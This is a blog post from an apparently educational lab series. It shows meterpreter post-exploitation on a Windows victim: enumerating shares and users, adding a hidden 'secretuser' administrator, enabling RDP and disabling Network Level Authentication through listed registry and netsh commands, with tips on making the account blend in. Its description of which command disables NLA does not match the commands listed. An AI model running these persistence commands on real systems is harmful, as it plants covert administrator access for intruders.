Creating a Cyber Attack – Part 7 (Post Exploitation – Gaining Persistence )

In this video we continue with post exploitation using metasploit and meterpreter, but this time using Windows commands to gain persistence. We start with our meterpreter shell, then use the Windows cmd prompt to run native commands to enumerate shares and users. We will also enable RDP, and create a new user adding the account to the required groups allowing remote access using reduced authentication controls.

If you have not read the previous guides or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

Don’t forget, for an attacker information is key. The more they know the better equipped they are to find a chink in the security of the defenders network.

As with this entire series, the attacker machine is on the right with the victim on the left.

Commands used in this video are;

  • net share
  • net user
  • net user secretuser £@55w.rd /add
  • net localgroup “Administrators” secretuser /add
  • net localgroup “Remote Desktop Users” secretuser /add
  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-TCP” /v UserAuthentication /t REG_DWORD /d “0” /f
  • netsh firewall set service type = remotedesktop mode = enable
  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyConnections /t REG_DWORD /d 0 /f

Let’s jump in

We start from our meterpreter prompt and launch our Windows prompt using shell

Used without parameters, net share displays information about all of the resources that are shared on the local computer. We see 3 shared locations, including the “Network Share” This would be a good place to start any file searches for “passwords” “payment” etc.

Used without parameters, net user displays all of the user accounts on the local computer. We can see the six available on the victim currently, however this will soon be seven.

Let’s create a new user named “secretuser” with the password “£@55w.rd”. Now in the real world this will be named to make it blend in with other accounts, they will follow your naming standards and make sure it does not stand out.

The command completes successfully and on the victim machine we can see the new account. Now a standard user account is not much use to us at this point so we want to add it to some groups which will allow us remote access and higher permissions. In this case we add it to the “Administrators” and the “Remote Desktop Users” groups.

Both complete successfully and we again confirm on the victim machine.

To enable RDP we need to run three commands. The first enables RDP, the second sets the firewall rules and the third disables Network Level Authentication.

  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-TCP” /v UserAuthentication /t REG_DWORD /d “0” /f
  • netsh firewall set service type = remotedesktop mode = enable
  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyConnections /t REG_DWORD /d 0 /f

All complete successfully (however we do get one message that the netsh firewall command is depreciated so I need to update myself on the new commands), so let’s test our connection.

and test our new login account.

We manage to login successfully (at the second attempt lol), but we would not want to kick off another user as this would raise suspicions so we just close the connection for now.

In the next post we continue with the last video in this series.